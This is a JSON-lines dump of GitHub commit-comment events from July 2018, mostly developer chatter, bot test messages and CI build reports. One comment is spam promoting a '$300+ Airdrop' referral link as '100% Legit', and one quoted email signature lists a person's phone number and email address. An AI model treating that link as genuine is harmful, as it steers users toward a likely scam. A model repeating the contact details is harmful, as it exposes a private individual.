HarfBuzz doesn’t have enough vowel categories for that.)"}},"created_at":"2018-07-30T23:51:27Z"}
{"id":"8040925931","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895752,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:52:29Z","updated_at":"2018-07-30T23:52:29Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:52:29Z"}
{"id":"8040928064","type":"CommitCommentEvent","actor":{"login":"mocona"},"repo":{"name":"ProjectInTheClass/moongaemoongae"},"payload":{"comment":{"id":29895758,"position":null,"line":null,"path":null,"commit_id":"b223923d060c342960377ef9531c8c947eeb7f94","created_at":"2018-07-30T23:53:14Z","updated_at":"2018-07-30T23:53:14Z","author_association":"NONE","body":"잠은 자고들 해요? ^^a"}},"created_at":"2018-07-30T23:53:14Z"}
{"id":"8040928125","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895759,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:53:16Z","updated_at":"2018-07-30T23:53:16Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:53:16Z"}
{"id":"8040930042","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895769,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:53:55Z","updated_at":"2018-07-30T23:53:55Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:53:55Z"}
{"id":"8040930385","type":"CommitCommentEvent","actor":{"login":"mocona"},"repo":{"name":"ProjectInTheClass/moongaemoongae"},"payload":{"comment":{"id":29895770,"position":null,"line":null,"path":null,"commit_id":"7aac9d94de3351451beae7e9fa9cd82353ce5881","created_at":"2018-07-30T23:54:01Z","updated_at":"2018-07-30T23:54:01Z","author_association":"NONE","body":"밤샜네, 밤샜어. 그래도 zero based index 하나는 잡았네 그려.. ㅎㅎ "}},"created_at":"2018-07-30T23:54:01Z"}
{"id":"8040931606","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895777,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:54:26Z","updated_at":"2018-07-30T23:54:26Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:54:26Z"}
{"id":"8040933375","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29895786,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T23:55:05Z","updated_at":"2018-07-30T23:55:05Z","author_association":"MEMBER","body":"@flyinghead Finally found a fix to the solution - turns out it was to do with  the libretro port. Sorry for bothering you so much about it.\r\n\r\nHere it was for reference -\r\n\r\nhttps://github.com/libretro/reicast-emulator/commit/806f8baaf39892a9fd1a8285af1cf834e458f38a\r\n\r\nBy setting NoBatch = 1 and DSPenabled = 1 onlly at first startup, the crash at startup was fixed."}},"created_at":"2018-07-30T23:55:05Z"}
{"id":"8040933957","type":"CommitCommentEvent","actor":{"login":"amanda-lan"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29895787,"position":null,"line":null,"path":null,"commit_id":"e77ef0e79029fb3686244bbf53bdf4555f7ed8d4","created_at":"2018-07-30T23:55:17Z","updated_at":"2018-07-30T23:55:17Z","author_association":"OWNER","body":"UserLoginService with PHP and MySQL\r\n\r\nThe followings are the things I might need to improve.\r\n1. Separate the MYSQL queries \r\n    by creating a class handling all the related issues. And last time you asked if I know what is OOP and now I am thinking it is about reusing the codes. \r\n2. Combine Login\\Sign up\\ (probably homepage) on the same page.\r\n3. Should add password resritctions.\r\n4. When users sign up, the script can check if the particular user has\r\n5. exists before putin the password and submit the form.\r\n6. Username can show in the colume and does not rewrite again if the password does not setup sucssessfully.\r\n7. Add emails to authenticate users when sign up.\r\n8. Add facebook and In as an alternative way to login."}},"created_at":"2018-07-30T23:55:17Z"}
{"id":"8040938620","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29895801,"position":null,"line":null,"path":null,"commit_id":"3d9ab9ee197e56f58ea27aa429a35278fa9d7a4a","created_at":"2018-07-30T23:56:56Z","updated_at":"2018-07-30T23:56:56Z","author_association":"MEMBER","body":"Saxon, the underlying library that oXygen relies on for XSLT and XQuery, has an option to disable XInclude processing when running XQuery, but unfortunately this is one of the many Saxon options that oXygen doesn't expose in its GUI. As a workaround for settings like this, oXygen does let you provide a Saxon configuration file that contains all of the fine-grained settings. I've tested a new transformation scenario that bundles this setting, and I've got it working, so I'll add this along with the document & note xml:id renumbering query in a set of commits tomorrow. "}},"created_at":"2018-07-30T23:56:56Z"}
{"id":"8040938954","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29895802,"position":null,"line":null,"path":null,"commit_id":"5f5d5bcf4c437926ebc3025835da1753b82c6d13","created_at":"2018-07-30T23:57:03Z","updated_at":"2018-07-30T23:57:03Z","author_association":"COLLABORATOR","body":"<h3>[ControlGroup] Add border-radius inheritance support to popovers (#2731)</h3>\n\nPreview: <strong><a href='https://19323-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19323-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19323-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-30T23:57:03Z"}
{"id":"8040940618","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-dotcall64-feedstock"},"payload":{"comment":{"id":29895809,"position":null,"line":null,"path":null,"commit_id":"eb16f3a1d56190a6073f41f9f2ba354a283c8919","created_at":"2018-07-30T23:57:37Z","updated_at":"2018-07-30T23:57:37Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jsignell was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-30T23:57:37Z"}
{"id":"8040943685","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/tk-pantheon-d8-composer-project"},"payload":{"comment":{"id":29895821,"position":null,"line":null,"path":null,"commit_id":"d70a81a41d5b1a932232529633d617c60dacb67d","created_at":"2018-07-30T23:58:45Z","updated_at":"2018-07-30T23:58:45Z","author_association":"OWNER","body":"Created multidev environment [tk-pantheon-d8-composer-project#ci-1](https://dashboard.pantheon.io/sites/0e5d3d11-9a4f-450c-b86e-575554655e6e#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-tk-pantheon-d8-composer-project.pantheonsite.io/)"}},"created_at":"2018-07-30T23:58:45Z"}
{"id":"8040943741","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895822,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:58:46Z","updated_at":"2018-07-30T23:58:46Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:58:46Z"}
{"id":"8040943752","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29895823,"position":null,"line":null,"path":null,"commit_id":"c005847a9998a7fbde28cd85b27e8f8e4556eecb","created_at":"2018-07-30T23:58:46Z","updated_at":"2018-07-30T23:58:46Z","author_association":"COLLABORATOR","body":"- `t.OverlayWidgetLayoutTypes` removed\r\n- `t.QuickSwitcherResultTypes` renamed to `t.AutocompleterResultTypes`\r\n\r\n## Strings\r\n#### Updated\r\n- `HELP_US_TRANSLATE_TITLE: \"Help translate Discord\"` -> `PUBLIC_TRANSLATION_SUNSET_TITLE: \"Attention Translators\"`\r\n- `HELP_US_TRANSLATE_BODY: \"Discord's localization is a community effort. If you want to see Discord translated into\\nanother language we'd love your help.\\n\\nTo apply visit our [translation site]({translationSiteURL}).\"` -> `PUBLIC_TRANSLATION_SUNSET_BODY: \"If you have ever contributed to our translation project, please check your email inbox associated with your Crowdin account!\"`\r\n- `FOCUS_PARTICIPANT: \"Focus Participant\"` -> `FOCUS_PARTICIPANT: \"Focus This Person\"`\r\n- `UNFOCUS_PARTICIPANT: \"Unfocus Participant\"` -> `UNFOCUS_PARTICIPANT: \"Unfocus This Person\"`\r\n#### Added\r\n- `CAPTCHA_ISSUES: \"Having issues with CAPTCHA?\"`\r\n- `CAPTCHA_PROBLEMS: \"CAPTCHA Problems?\"`\r\n- `CAPTCHA_PROBLEMS_INFO: \"If you have 99 problems with completing CAPTCHA (or maybe just 1), like no Google Play Services or a custom ROM, you can complete it in your mobile browser.\"`\r\n- `CAPTCHA_OPEN_BROWSER: \"Open Browser\"`"}},"created_at":"2018-07-30T23:58:46Z"}
{"id":"8040944568","type":"CommitCommentEvent","actor":{"login":"dkulp"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29895824,"position":null,"line":null,"path":null,"commit_id":"24dbe9775c1901b24a514ead28923227922b30af","created_at":"2018-07-30T23:59:04Z","updated_at":"2018-07-30T23:59:04Z","author_association":"CONTRIBUTOR","body":"Correct.  We need the actual RGB values as we'll be sending them out to LED panels.   With the LED panels, there is a very big difference between a pure red (only Red LED on) and the almost yellow that results as the green LED also starts lighting up.  "}},"created_at":"2018-07-30T23:59:04Z"}
{"id":"8040945604","type":"CommitCommentEvent","actor":{"login":"tgivargis"},"repo":{"name":"DataDog/hiring-engineers"},"payload":{"comment":{"id":29895828,"position":null,"line":null,"path":null,"commit_id":"478499d47c60a795ea71c6a598083aea51c78b49","created_at":"2018-07-30T23:59:26Z","updated_at":"2018-07-30T23:59:26Z","author_association":"NONE","body":"uploaded answers.md"}},"created_at":"2018-07-30T23:59:26Z"}
{"id":"8040947256","type":"CommitCommentEvent","actor":{"login":"Pomax"},"repo":{"name":"Pomax/processing-bezier-master"},"payload":{"comment":{"id":29895832,"position":null,"line":null,"path":null,"commit_id":"0f8b5c64fa20cd7fefa859ed9f38f8dc48aab68c","created_at":"2018-07-30T23:59:57Z","updated_at":"2018-07-30T23:59:57Z","author_association":"OWNER","body":"Hm...  so here's a weird thing: if I try to reverse that behaviour by using `if (step <0.0) ... else if (step > 0.0) ...` then the scroll behaviour doesn't change. Both `>/<` and `</>` do the same thing O_o"}},"created_at":"2018-07-30T23:59:57Z"}
{"id":"8035227048","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29878881,"position":1,"line":null,"path":"1532919627.81/github_test.txt","commit_id":"46f49a88d90b92d282528dfdd6fe2a861c34a62f","created_at":"2018-07-30T03:00:29Z","updated_at":"2018-07-30T03:00:29Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-30T03:00:29Z"}
{"id":"8035228282","type":"CommitCommentEvent","actor":{"login":"amio"},"repo":{"name":"amio/now-deploy-badge"},"payload":{"comment":{"id":29878882,"position":null,"line":null,"path":null,"commit_id":"67622b95aff61ff8af25bd99c32d36a4e000ba37","created_at":"2018-07-30T03:00:58Z","updated_at":"2018-07-30T03:00:58Z","author_association":"OWNER","body":"I hide them to make the \"default\" one more popup, others just my exploration. I'm thinking of removing the \"bash\" one, it's not so fit in the queue 😆"}},"created_at":"2018-07-30T03:00:58Z"}
{"id":"8035235345","type":"CommitCommentEvent","actor":{"login":"RocksteadyTC"},"repo":{"name":"turtlecoin/TurtleToTurtleProtocol"},"payload":{"comment":{"id":29878895,"position":null,"line":null,"path":null,"commit_id":"496886ee00fec0921a915349b75da40c8b5d7e31","created_at":"2018-07-30T03:03:51Z","updated_at":"2018-07-30T03:03:51Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/34389545/43375530-2e0301fa-93a5-11e8-891f-fa352160382f.png)\r\n"}},"created_at":"2018-07-30T03:03:51Z"}
{"id":"8035238607","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29878900,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-30T03:05:15Z","updated_at":"2018-07-30T03:05:15Z","author_association":"NONE","body":"$300+ Airdrop - https://www.avinoc.com/r/Xa4hvUactw9o (100% Legit)\r\n"}},"created_at":"2018-07-30T03:05:15Z"}
{"id":"8035240426","type":"CommitCommentEvent","actor":{"login":"hoangthan"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29878906,"position":19,"line":19,"path":"Vidly/Controllers/CustomersController.cs","commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2018-07-30T03:06:04Z","updated_at":"2018-07-30T03:06:04Z","author_association":"NONE","body":"Any one can explain me what does: \"GetCustomers().SingleOrDefault(c => c.Id == id);\" mean ? I'm not understand it clearly."}},"created_at":"2018-07-30T03:06:04Z"}
{"id":"8035241568","type":"CommitCommentEvent","actor":{"login":"luuucaaas29"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29878910,"position":null,"line":null,"path":null,"commit_id":"d5d1ef8542c767ed6f49c8061e7873a902a73e63","created_at":"2018-07-30T03:06:33Z","updated_at":"2018-07-30T03:06:33Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Cadastro de Secretário](https://trello.com/c/kCxCxQcF/11-cadastro-de-secret%C3%A1rio)"}},"created_at":"2018-07-30T03:06:33Z"}
{"id":"8035241735","type":"CommitCommentEvent","actor":{"login":"luuucaaas29"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29878911,"position":null,"line":null,"path":null,"commit_id":"8750e029b6bcd11f2dfda02bf2f960346da875a1","created_at":"2018-07-30T03:06:37Z","updated_at":"2018-07-30T03:06:37Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Cadastro de Secretário](https://trello.com/c/kCxCxQcF/11-cadastro-de-secret%C3%A1rio)"}},"created_at":"2018-07-30T03:06:37Z"}
{"id":"8035242564","type":"CommitCommentEvent","actor":{"login":"Carson2006"},"repo":{"name":"KSP-KOS/KOS"},"payload":{"comment":{"id":29878913,"position":null,"line":null,"path":null,"commit_id":"83076f345cd86eaebd6fa7f0dd8810c22016bfa0","created_at":"2018-07-30T03:07:01Z","updated_at":"2018-07-30T03:07:01Z","author_association":"NONE","body":"Understood. Thanks for all the work you've done with KOS.\r\n\r\nMy current \"workaround\" is to just comment out the code that compiles files, and use all files as .ks"}},"created_at":"2018-07-30T03:07:01Z"}
{"id":"8035244049","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29878914,"position":null,"line":null,"path":null,"commit_id":"43b81cde3af78d6d5e583df6bed5bd32c161620e","created_at":"2018-07-30T03:07:44Z","updated_at":"2018-07-30T03:07:44Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-30T03:07:44Z"}
{"id":"8035245672","type":"CommitCommentEvent","actor":{"login":"prashantjeetsingh"},"repo":{"name":"prashantjeetsingh/Test"},"payload":{"comment":{"id":29878917,"position":5,"line":6,"path":"src/main/java/testing.java","commit_id":"c5749ab0504c657097f567f22ebc72f49aec94f4","created_at":"2018-07-30T03:08:30Z","updated_at":"2018-07-30T03:08:30Z","author_association":"OWNER","body":"why this code"}},"created_at":"2018-07-30T03:08:30Z"}
{"id":"8035249368","type":"CommitCommentEvent","actor":{"login":"xlxes"},"repo":{"name":"xlxes/ROS"},"payload":{"comment":{"id":29878928,"position":null,"line":null,"path":null,"commit_id":"022e6ea754b5bdd4745728efb887205df8bb6979","created_at":"2018-07-30T03:10:08Z","updated_at":"2018-07-30T03:10:08Z","author_association":"OWNER","body":"关于树莓派zero w版建立ros基础通讯"}},"created_at":"2018-07-30T03:10:08Z"}
{"id":"8035252276","type":"CommitCommentEvent","actor":{"login":"moon2263"},"repo":{"name":"moon2263/packet_capture"},"payload":{"comment":{"id":29878939,"position":103,"line":146,"path":"main.cpp","commit_id":"a6fba5ae62cbf39cc9543422c20d781a83b62193","created_at":"2018-07-30T03:11:24Z","updated_at":"2018-07-30T03:11:24Z","author_association":"OWNER","body":"fourth commit : https://github.com/moon2263/packet_capture/commit/d132422d14dad8f9e6fc2da3a3803c72c0c59753#diff-118fcbaaba162ba17933c7893247df3a"}},"created_at":"2018-07-30T03:11:24Z"}
{"id":"8035253596","type":"CommitCommentEvent","actor":{"login":"BobDokubo2016"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29878943,"position":19,"line":19,"path":"Vidly/Controllers/CustomersController.cs","commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2018-07-30T03:11:59Z","updated_at":"2018-07-30T03:11:59Z","author_association":"NONE","body":"It means you are querying customer data from the database by ID as a\ndefault. Hope this helps. Otherwise anyone else can as well explain. I’m\nalso still learning lol thanks All.\n\nOn Sun, Jul 29, 2018 at 11:06 PM TommyThan <notifications@github.com> wrote:\n\n> Any one can explain me what does: \"GetCustomers().SingleOrDefault(c =>\n> c.Id == id);\" mean ? I'm not understand it clearly.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mosh-hamedani/vidly-mvc-5/commit/b727a26e1b4b88abe84a8b48208fec537db2ed43#commitcomment-29878906>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AT6-Nqq-j9aGRlufw9WILnA1rv65BFFLks5uLngggaJpZM4JEcYW>\n> .\n>\n-- \n*Thanks and regards,*\n*Bobmanuel Ake*\n\n*Phone#: 856-673-6393*\n*EmailAddress: bobattalentcreek@gmail.com <bobattalentcreek@gmail.com>*\n"}},"created_at":"2018-07-30T03:11:59Z"}
{"id":"8035255723","type":"CommitCommentEvent","actor":{"login":"jesanje2"},"repo":{"name":"marshallmcdonnell/lammps_widom_insertion"},"payload":{"comment":{"id":29878946,"position":null,"line":null,"path":null,"commit_id":"752f42a4529484659b99638d7d25304ea4a810dc","created_at":"2018-07-30T03:12:51Z","updated_at":"2018-07-30T03:12:51Z","author_association":"NONE","body":"Thank you for this interesting work on Chemical Potential calculations. Could you please add some instructions for windows users?"}},"created_at":"2018-07-30T03:12:51Z"}
{"id":"8035256777","type":"CommitCommentEvent","actor":{"login":"ilinbxu"},"repo":{"name":"zcadditions/ZCA-Bootstrap-Template"},"payload":{"comment":{"id":29878948,"position":4,"line":108,"path":"includes/templates/bootstrap/templates/tpl_modules_create_account.php","commit_id":"b55f329cbc4d0e6938adb1a98a205c8cd082420c","created_at":"2018-07-30T03:13:16Z","updated_at":"2018-07-30T03:13:16Z","author_association":"NONE","body":"Sorry, I added an extra PHP tag."}},"created_at":"2018-07-30T03:13:16Z"}
{"id":"8035260564","type":"CommitCommentEvent","actor":{"login":"neorxna"},"repo":{"name":"UoA-eResearch/research-hub-web"},"payload":{"comment":{"id":29878960,"position":6,"line":9,"path":"Dockerfile","commit_id":"2203a5fe6e013f4457032191476eb8155c897ff4","created_at":"2018-07-30T03:14:52Z","updated_at":"2018-07-30T03:14:52Z","author_association":"CONTRIBUTOR","body":"Needs ```&&``` between commands"}},"created_at":"2018-07-30T03:14:52Z"}
{"id":"8035263085","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29878971,"position":null,"line":null,"path":null,"commit_id":"43b81cde3af78d6d5e583df6bed5bd32c161620e","created_at":"2018-07-30T03:15:56Z","updated_at":"2018-07-30T03:15:56Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1702 of 1702 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.08%25-green.png)</a>\n"}},"created_at":"2018-07-30T03:15:56Z"}
{"id":"8035264368","type":"CommitCommentEvent","actor":{"login":"neorxna"},"repo":{"name":"UoA-eResearch/research-hub-web"},"payload":{"comment":{"id":29878973,"position":6,"line":9,"path":"Dockerfile","commit_id":"2203a5fe6e013f4457032191476eb8155c897ff4","created_at":"2018-07-30T03:16:26Z","updated_at":"2018-07-30T03:16:26Z","author_association":"CONTRIBUTOR","body":"@Hganavak "}},"created_at":"2018-07-30T03:16:26Z"}
{"id":"8035265188","type":"CommitCommentEvent","actor":{"login":"schanzer"},"repo":{"name":"lambdageek/codemirror-blocks"},"payload":{"comment":{"id":29878976,"position":5,"line":343,"path":"src/blocks.js","commit_id":"2a67fa8adbbc975c48e9deb012c36997a98ce5d7","created_at":"2018-07-30T03:16:46Z","updated_at":"2018-07-30T03:16:46Z","author_association":"NONE","body":"ooof. yep"}},"created_at":"2018-07-30T03:16:46Z"}
{"id":"8035265523","type":"CommitCommentEvent","actor":{"login":"moningkai"},"repo":{"name":"moningkai/RoadPlane_StereoMatching"},"payload":{"comment":{"id":29878978,"position":null,"line":null,"path":null,"commit_id":"1c92fbe728e92d6d8e6e33dd75a21badfc1ee0ad","created_at":"2018-07-30T03:16:54Z","updated_at":"2018-07-30T03:16:54Z","author_association":"OWNER","body":"liheng"}},"created_at":"2018-07-30T03:16:54Z"}
{"id":"8035266805","type":"CommitCommentEvent","actor":{"login":"neorxna"},"repo":{"name":"UoA-eResearch/research-hub-web"},"payload":{"comment":{"id":29878981,"position":6,"line":9,"path":"Dockerfile","commit_id":"2203a5fe6e013f4457032191476eb8155c897ff4","created_at":"2018-07-30T03:17:20Z","updated_at":"2018-07-30T03:17:20Z","author_association":"CONTRIBUTOR","body":"@Hganavak "}},"created_at":"2018-07-30T03:17:20Z"}
{"id":"8035267901","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29878984,"position":null,"line":null,"path":null,"commit_id":"43b81cde3af78d6d5e583df6bed5bd32c161620e","created_at":"2018-07-30T03:17:49Z","updated_at":"2018-07-30T03:17:49Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-30T03:17:49Z"}
{"id":"8035270945","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29878986,"position":null,"line":null,"path":null,"commit_id":"0b7a8fad0493cebdd80fb1156ad7d00b40667b88","created_at":"2018-07-30T03:19:08Z","updated_at":"2018-07-30T03:19:08Z","author_association":"OWNER","body":"@samm82, this is definitely an improvement, but what you have implemented is a \"template module\", not a \"module.\"  There is only one instance of Input, so it doesn't need self.  Have another look at the material I mentioned above.  In Python terminology you have class level variables, not object level variables.  "}},"created_at":"2018-07-30T03:19:08Z"}
{"id":"8035274163","type":"CommitCommentEvent","actor":{"login":"jykim3097"},"repo":{"name":"jykim3097/StudyForRD"},"payload":{"comment":{"id":29878995,"position":null,"line":null,"path":null,"commit_id":"ad9fcaedad45d61f5dd32c3df517273499fb78bb","created_at":"2018-07-30T03:20:31Z","updated_at":"2018-07-30T03:20:31Z","author_association":"OWNER","body":"열공하지명"}},"created_at":"2018-07-30T03:20:31Z"}
{"id":"8035295712","type":"CommitCommentEvent","actor":{"login":"DaveidWeba"},"repo":{"name":"DaveidWeba/PlexGuide.com-The-Awesome-Plex-Server"},"payload":{"comment":{"id":29879040,"position":null,"line":null,"path":null,"commit_id":"52c9a502aa39e18cb25fb40890625cc7922802bb","created_at":"2018-07-30T03:29:56Z","updated_at":"2018-07-30T03:29:56Z","author_association":"OWNER","body":"#371"}},"created_at":"2018-07-30T03:29:56Z"}
{"id":"8035296210","type":"CommitCommentEvent","actor":{"login":"EndLess728"},"repo":{"name":"AEXmod/platform_packages_apps_Dialer"},"payload":{"comment":{"id":29879043,"position":null,"line":null,"path":null,"commit_id":"8099cb7291753f274e8075c981f52a6cd20b8152","created_at":"2018-07-30T03:30:10Z","updated_at":"2018-07-30T03:30:10Z","author_association":"NONE","body":"Compiling 😉"}},"created_at":"2018-07-30T03:30:10Z"}
{"id":"8035298551","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29879050,"position":null,"line":null,"path":null,"commit_id":"bfa3385aedd4616d5b6beefe9fdfa8f02785bffc","created_at":"2018-07-30T03:31:07Z","updated_at":"2018-07-30T03:31:07Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-30T03:31:07Z"}
{"id":"8035304063","type":"CommitCommentEvent","actor":{"login":"andrygreen777"},"repo":{"name":"faressoft/terminalizer"},"payload":{"comment":{"id":29879060,"position":4,"line":4,"path":"utility.js","commit_id":"d1153e58ba4cef0aa65e851a39e8e2d971c69e7d","created_at":"2018-07-30T03:33:34Z","updated_at":"2018-07-30T03:33:34Z","author_association":"NONE","body":"K\r\n"}},"created_at":"2018-07-30T03:33:34Z"}
{"id":"8035307121","type":"CommitCommentEvent","actor":{"login":"ramakrishnach31"},"repo":{"name":"SrinivasVudugula/HealthCare"},"payload":{"comment":{"id":29879066,"position":null,"line":null,"path":null,"commit_id":"055b7a78109863f04b255e844f0a5f2e71f0ed96","created_at":"2018-07-30T03:34:57Z","updated_at":"2018-07-30T03:34:57Z","author_association":"NONE","body":"In this sprint what we need to develop"}},"created_at":"2018-07-30T03:34:57Z"}
{"id":"8035309052","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29879072,"position":10,"line":10,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-30T03:35:50Z","updated_at":"2018-07-30T03:35:50Z","author_association":"MEMBER","body":"`brew audit`, a similar command for Homebrew, includes an option `--online` to enable extra checks. For example:\r\n\r\n* Check whether the homepage URL is accessible or not\r\n* If the homepage points to a GitHub URL, is it \"notable\" enough (>=30 forks or >=30 watchers or >=75 stars) _Well, god knows where such criteria come from_\r\n\r\nFor MacPorts, possible `online` checks might be\r\n\r\n* Check if an email address is valid or not. That includes (1) if the specified domain can be mapped to an IP? (2) if no domain is specified, is it a MacPorts developer?\r\n* If the homepage URL is accessible\r\n* If there's a related Trac ticket not mentioned in the last commit message\r\n* If there's already a pull request for the same port\r\n* (more to come?)"}},"created_at":"2018-07-30T03:35:50Z"}
